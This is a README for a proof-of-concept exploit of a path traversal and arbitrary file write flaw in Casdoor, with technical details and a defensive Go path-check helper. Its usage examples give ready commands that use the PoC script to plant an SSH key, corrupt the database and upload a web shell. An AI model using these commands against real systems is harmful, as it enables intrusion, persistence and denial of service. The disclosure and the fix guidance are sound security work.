# CVE-2026-6815: Casdoor <3.54.1 Path Traversal & Arbitrary File Write (Authenticated)

This repository contains a Proof of Concept (PoC) exploit for [CVE-2026-6815](https://www.kb.cert.org/vuls/id/937808), an arbitrary file write and path traversal vulnerability in [Casdoor](https://github.com/casdoor/casdoor).

The vulnerability has been [fixed](https://github.com/casdoor/casdoor/pull/5458) in version [3.54.1](https://github.com/casdoor/casdoor/releases/tag/v3.54.1). 

## Requirements
The attacker must be authenticated to the Casdoor instance with admin privileges, or as a user with equivalent rights to create and/or edit storage providers.

## Impact
- **Remote Code Execution (RCE)**: By writing to sensitive locations like `.ssh/authorized_keys`, crontabs, or webroots.
- **Denial of Service (DoS)**: Overwriting the application database (`casdoor.db`) or core binaries with arbitrary content, which stops the application immediately.

## Technical Details
Casdoor allows administrators to configure storage providers. The `Local File System` provider fails to properly sanitize the `pathPrefix` configuration and the `fullFilePath` parameter during resource uploads. 

By using directory traversal sequences (`../`), an authenticated administrator can escape the dedicated storage directory and write files anywhere the Casdoor process has permissions.

The vulnerability stems from insufficient path validation in:
- `object/provider.go`: No validation on `pathPrefix` during creation/update.
- `storage/local_file_system.go`: The `GetFullPath` method does not verify if the resolved path remains within the intended sandbox.
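The defensive check that was missing from `GetFullPath` is to resolve the joined path and confirm it is still inside the storage root before touching the filesystem. The helper below is an added example written for this README; it is not Casdoor's code nor the fix from the upstream pull request, and the storage root `/srv/casdoor/files` and the function name `SafeFullPath` are assumptions. It treats both `pathPrefix` and `fullFilePath` as untrusted and rejects any result that escapes the root.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrPathEscape is returned when a resolved path leaves the storage root.
var ErrPathEscape = errors.New("resolved path escapes the storage root")

// SafeFullPath joins a storage root with the provider's pathPrefix and the
// requested fullFilePath, then verifies that the cleaned result is still
// inside the root. Both inputs are untrusted: on vulnerable versions either
// could carry "../" sequences. Symlinks are not resolved here; if the root
// may contain symlinks, call filepath.EvalSymlinks on the parent as well.
func SafeFullPath(root, pathPrefix, fullFilePath string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	// Drop leading separators so an "absolute" input is confined under root.
	prefix := strings.TrimLeft(pathPrefix, `/\`)
	name := strings.TrimLeft(fullFilePath, `/\`)
	joined := filepath.Join(absRoot, prefix, name) // Join also runs Clean
	rel, err := filepath.Rel(absRoot, joined)
	if err != nil {
		return "", err
	}
	// A relative path of ".." or starting with "../" points outside root.
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrPathEscape
	}
	return joined, nil
}

func main() {
	root := "/srv/casdoor/files" // hypothetical storage root
	for _, c := range [][2]string{
		{"built-in/resource", "avatar.png"},                 // legitimate upload
		{"../../../home/casdoor/.ssh", "authorized_keys"},  // traversal via pathPrefix
		{"built-in", "../../app/casdoor.db"},               // traversal via fullFilePath
	} {
		p, err := SafeFullPath(root, c[0], c[1])
		fmt.Printf("prefix=%q file=%q -> path=%q err=%v\n", c[0], c[1], p, err)
	}
}
```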

## Usage
1. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```

2. Run the exploit:
   ```bash
   python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
   ```

## Usage Examples

### 1. SSH Key Injection for RCE
Write an attacker-controlled public key to the `authorized_keys` file of the `casdoor` user to gain SSH access.
```bash
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file id_rsa.pub --rpath /home/casdoor/.ssh/authorized_keys
```

### 2. Persistent DoS (Database Corruption)
Overwrite the application's local database file (e.g., `casdoor.db`) to cause a denial of service.
```bash
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db
```

### 3. Web Shell Upload (Secondary Webroot)
If the server is hosting a secondary web server (e.g., Apache/Nginx) on the same filesystem, write a web shell into its document root.
```bash
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php
```

### 4. Custom Organization and Application
If you have administrative credentials for a specific organization and application (other than the defaults `built-in` and `app-built-in`), specify them using `--orgname` and `--appname`.
```bash
python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt
```

## Disclaimer
This software is for educational and authorized security testing purposes only. The author is not responsible for any misuse of this information.

## Author
Vulnerability discovered and PoC developed by **[Danilo Dell'Orco](https://github.com/danilo-dellorco) (sixpain)**.